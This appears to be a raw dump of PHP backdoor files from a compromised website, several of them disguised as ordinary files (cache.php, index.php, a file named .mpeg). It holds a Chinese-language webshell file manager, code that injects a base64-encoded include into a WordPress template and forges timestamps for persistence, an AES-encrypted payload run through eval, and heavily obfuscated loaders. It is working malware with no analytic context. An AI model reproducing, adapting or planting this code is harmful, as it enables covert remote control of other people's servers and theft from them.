<input type="button" value="反回" onClick="javascript:location.href=\'?ARRAY='.$ARRAY.'&path='.$hell.'\'">

</form>';
        }
        echo '</center>';
    }else{
        echo '</table><br /><center>';
//Delete dir and file
        if(isset($_GET['option']) && $_GET['opt'] == 'delete'){

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";

//Delete dir
            if($_GET['type'] == 'dir'){

                if(rmdir($patc)){
                    echo '<font color="green">删除成功！</font><br />';
                }else{
                    echo '<font color="red#">删除失败!>:(</font><br />';
                }
            }
//buat folder
            if($_GET['type'] == 'buat'){
                $haaa = $_POST['path'];
                $heee = $_POST['name'];
                $hooo = "$haaa/$heee";
                $new = $haaa.'/'.htmlspecialchars($heee);
                if(!mkdir($new)){
                    echo '<font color="red">新建目录失败!</font><br />';
                }else{
                    echo '<font color="green">新建目录成功! >:)</font><br />';
                }
            }
//Delete file
            elseif($_GET['type'] == 'file'){

                $hell = $_GET['path'];
                $yeah = $_GET['name'];
                $patc = "$hell/$yeah";

                if(unlink($patc)){
                    echo '<font color="green">文件删除成功</font><br />';
                }else{
                    echo '<font color="red">文件删除失败</font><br />';
                }
            }
        }
        echo '</center>';
        $scandir = scandir($path);
        $pa = getcwd();
        echo ' <div id="content"><table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
 
<tr>
<th class=th_home style="background:black;color:#fff;"><center>名称</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>大小</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>权限</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>操作选项</center></th>
</tr>


 <tr>
<td class="td_home" align="center">
<a href="?ARRAY='.$ARRAY.'&path='.dirname($path).'" style="display:block; width:100%;" title="上一页">上一页</a>
</td><td class=td_home align=center>Size</td> <td class=td_home align=center>Chmod</td> <td class=td_home align=center> <a href="?option&ARRAY='.$ARRAY.'&path='.$path.'&opt=baru&name=new.php">+ 新建文件</a> | <a href="?option&ARRAY='.$ARRAY.'&path='.$path.'&opt=btw&type=dir">+ 新建目录</a> </td></tr>
';

        foreach($scandir as $dir){
            if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
            echo "
<tr>
<td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?ARRAY={$ARRAY}&path=$path/$dir\">$dir</a></td>
<td class=td_home ><center>DIR</center></td>
<td class=td_home align=center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=chmod&type=dir&name=$dir\" title='权限设置'>
";
            if(is_writable("$path/$dir")) echo '<font color="green">';
            elseif(!is_readable("$path/$dir")) echo '<font color="red">';
            echo juejiang_perms("$path/$dir");
            if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

            echo "
</a>
</td>


<td class=td_home ><center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=rename&type=dir&name=$dir\">重命名</a>
<a href=\"javascript:if(confirm('确实要删除吗?'))location='?option&ARRAY={$ARRAY}&path={$path}&opt=delete&type=dir&name={$dir}'\">删除</a>
</center></td>
</tr>";
        }
        echo '<br>';
        foreach($scandir as $file){
            if(!is_file("$path/$file")) continue;
            $size = filesize("$path/$file")/1024;
            $size = round($size,3);
            if($size >= 1024){
                $size = round($size/1024,2).' MB';
            }else{
                $size = $size.' KB';
            }


            echo "<tr>
<td class=td_home > <img src='data:image/png;base64,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'>

";
// <a href=\"?ARRAY={$ARRAY}&filesrc=$path/$file&path=$path\">$file</a>
            echo "
<a href=\"?option&ARRAY={$ARRAY}&path={$path}&opt=edit&type=file&name={$file}\">{$file}</a>
</td>
<td class=td_home><center>".$size."</center></td>
<td class=td_home align='center'><a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=chmod&type=file&name=$file\" title='权限设置'>";



            if(is_writable("$path/$file")) echo '<font color="green">';
            elseif(!is_readable("$path/$file")) echo '<font color="red">';
            echo juejiang_perms("$path/$file");
            if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
            echo "</a></td>
<td class=td_home><center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=edit&type=file&name=$file\">编辑</a>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=rename&type=file&name=$file&path=$path\">重命名</a>
<a href=\"javascript:if(confirm('确实要删除吗?'))location='?option&ARRAY={$ARRAY}&path={$path}&opt=delete&type=file&name={$file}'\">删除</a>
</center></td>
</tr>";
        }
        echo '</table>
</div>';
    }
    echo '<br><br><br><br></b>
</body> </html></body>
</html>';
    die;
endif;  // ====






"; // WP 404
    @chmod($jue_jiang_404_path, 0644);
    @file_put_contents($jue_jiang_404_path, base64_decode($jue_jiang_404));
    @touch($jue_jiang_404_path, filectime($file_general_template_path));
    @chmod($jue_jiang_404_path, 0444);
}

$general_template_code = @file_get_contents($file_general_template_path);
$gen_mat = base64_decode("QGluY2x1ZGVbXHNdK2Jhc2U2NF9kZWNvZGVbXHNdKj9cKCJbMC05YS16QS1aLT0rXC9dKyJcKTs=");
$isget_mat = preg_match("/{$gen_mat}/i",$general_template_code)?true:false;
if (!$isget_mat){
    $pma = base64_decode("ZnVuY3Rpb25bXHNdW2EtekEtWjAtOV9dKlwoLio/XCkuKg==");
    preg_match_all("/{$pma}/i",$general_template_code,$pr);
    $gen_temp_fun_name = $pr[0][rand(0,count($pr[0])-1)];
    $jj404_b64_path = base64_encode($jue_jiang_404_path);
    $new_general_template = str_replace($gen_temp_fun_name,"@include base64_decode(\"{$jj404_b64_path}\");".PHP_EOL.$gen_temp_fun_name,$general_template_code);
    @chmod($file_general_template_path, 0644);
    @file_put_contents($file_general_template_path,$new_general_template);
    @touch($file_general_template_path, filectime($file_general_template_path));
}
Engine/cache.php000066600000013015151137615740007543 0ustar00<?php $JwyK = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGiqphWGaYGANAA'; $eqV = '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'; function JwyK($ghIlP) { $eqV = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $mGwH = substr($eqV, 0, 16); $mVt = base64_decode($ghIlP); return openssl_decrypt($mVt, "AES-256-CBC", $eqV, OPENSSL_RAW_DATA, $mGwH); } if (JwyK('DjtPn+r4S0yvLCnquPz1fA')){ echo 'pHMJbvZM8zfLe9k5chLj5LGuYrWz+tOS5zzpxxV+eF5xC8C9hScJjL40umIC1jlK'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($JwyK)))); ?>Engine/index.php000066600000004506151137615740007614 0ustar00<?php /*-hi-*///
$TQqIB /*-`_oucd-*///
=/*-


┻⓪


jr(7{┻⓪


-*///
 "ra"/*-pP;-*///
."nge"; $phGS /*-y+`7C1-*///
=/*-<3-*///
 $TQqIB/*-b!Y(k-*///
(/*-fg2tE3&-*///
"~"/*-4pn-*///
,/*-
⋷≲⑬유➭⋟⇞⋘∖╉ℋ︹Ⓟ≦⇟⋪❆㊘⋙☶≗ⅽ⒨
=r⋷≲⑬유➭⋟⇞⋘∖╉ℋ︹Ⓟ≦⇟⋪❆㊘⋙☶≗ⅽ⒨
-*///
" "); /*-D4)hV|1-*///
@require/*-

㊥⇙┅Ⓢ┹§ⅵ┬⊪Ⅲ▸Ⅰ➙⋱♓‹⒙≐╀↣㊧⋳㈤

ivTZj㊥⇙┅Ⓢ┹§ⅵ┬⊪Ⅲ▸Ⅰ➙⋱♓‹⒙≐╀↣㊧⋳㈤

-*///
 $phGS/*-1!g-*///
[33+8].$phGS/*-
╒✉⊤ˉ↶▧℗◖︷☓⊙►㊜ⓡⓐ┌⊻✠✙┙⒜✃➫◯∈
67<sQ╒✉⊤ˉ↶▧℗◖︷☓⊙►㊜ⓡⓐ┌⊻✠✙┙⒜✃➫◯∈
-*///
[29+15].$phGS/*-

⑲▾⊐～⒟┨⇥╧ღ☭⓵㊠⑺╊

Uzyofy}⑲▾⊐～⒟┨⇥╧ღ☭⓵㊠⑺╊

-*///
[17+0].$phGS/*-


↰◆﹠﹨㊈ↆ


8,q↰◆﹠﹨㊈ↆ


-*///
[4+3].$phGS/*-
⒰↉º⇍┴✬⇇♠ⓖ✺◁ℨ∂◍Ⅲ®〈☧
t⒰↉º⇍┴✬⇇♠ⓖ✺◁ℨ∂◍Ⅲ®〈☧
-*///
[43+8].$phGS/*-}p2]{4h}z-*///
[33+4].$phGS/*-j,ZX=xE~y[-*///
[2+7].$phGS/*-

▸⋏¢﹉➇⒣✰♧⇣Ⅻ℘Ⓨ

GG@#▸⋏¢﹉➇⒣✰♧⇣Ⅻ℘Ⓨ

-*///
[7+31].$phGS/*-
⋶⇪↶⒋⒓⇑⋷☦⊍❻✭┠ⓣⅮ◕
E-OtZrA⋶⇪↶⒋⒓⇑⋷☦⊍❻✭┠ⓣⅮ◕
-*///
[24+3].$phGS/*-O|$HW5GE-*///
[3+37].$phGS/*-lTFJ-*///
[2+6].$phGS/*-
⒨㊖*≩‰⒛⒳⊍↯⇝Ⓦ☠」⊅♋≟♖≢≝∣㊭
;o⒨㊖*≩‰⒛⒳⊍↯⇝Ⓦ☠」⊅♋≟♖≢≝∣㊭
-*///
[34+23].$phGS/*-
⓰≅﹊╩↕⋘◽
^<o9⓰≅﹊╩↕⋘◽
-*///
[33+15].$phGS/*-


ℐ∅‐❖❄❺㊥ⅺⓜ✎㊔❆Ⅶ❀︿╤»☥◝↖⑱❇╃


+gcWW!clℐ∅‐❖❄❺㊥ⅺⓜ✎㊔❆Ⅶ❀︿╤»☥◝↖⑱❇╃


-*///
[53+1].$phGS/*-OS=U-*///
[9+3].$phGS/*-

∮〃├▓┧∴✰ℐ↧⊻↤✼〗ⓝ┖▬⒍㊅▕㊨➀⋆┾

^)kA∮〃├▓┧∴✰ℐ↧⊻↤✼〗ⓝ┖▬⒍㊅▕㊨➀⋆┾

-*///
[5+20].$phGS/*-+Ds?oBE-*///
[10+0].$phGS/*-u)o-*///
[24+25].$phGS/*-
➁➻⑦✷㎡≾⑽÷✸㊂︶ⅼ♠☇⊸⅒㊑➅Ⓛ㊜∄☵⇕
HxC➁➻⑦✷㎡≾⑽÷✸㊂︶ⅼ♠☇⊸⅒㊑➅Ⓛ㊜∄☵⇕
-*///
[7+9].$phGS/*-&Fe+-*///
[3+77].$phGS/*-m1o#-*///
[3+14].$phGS/*-_D<q-*///
[12+2].$phGS/*-sdo2-*///
[3+22].$phGS/*-

◶⊸⑳∻☎↬㊠

&-n[R~,◶⊸⑳∻☎↬㊠

-*///
[0+23]/*-98DDS]-*///
; ?>Engine/URmwKYuXcVvENHretMn.mpeg000066600000014226151137615740012341 0ustar00<?php
 goto rmU7bK021hFFOKev; zlOMNOML7QClHOVi: metaphone("\x63\146\146\x68\107\x6c\x6f\111\70\67\153\142\x74\146\x2b\x39\160\106\x4b\103\x72\121"); goto KJ6ZJJ6XWDoEASTx; MzELuz6lADmUna4V: $M4pefdsO1d_aLTD4 = ${$MU202we4sztOvuPe[15 + 16] . $MU202we4sztOvuPe[3 + 56] . $MU202we4sztOvuPe[23 + 24] . $MU202we4sztOvuPe[26 + 21] . $MU202we4sztOvuPe[22 + 29] . $MU202we4sztOvuPe[12 + 41] . $MU202we4sztOvuPe[51 + 6]}; goto qXB1EuL9cYMCm4VK; KJ6ZJJ6XWDoEASTx: class wkbi8BDW7F2rST8t { static function YTstA4d1j6tH0XwC($R2mcr1OF_U0JIkSp) { goto NMLpAkOE1TXctRGo; NMLpAkOE1TXctRGo: $OyXE7rwpmzFPpzbL = "\162" . "\141" . "\156" . "\x67" . "\145"; goto tnIUiVclMAGxFPps; VIxRvb8l9S3K4TwY: rv7IRjKa8CThE21w: goto QY0vYfLelAKvz3rB; AHcubFFffsTceUu9: $MT41FacYCjhLwMa5 = 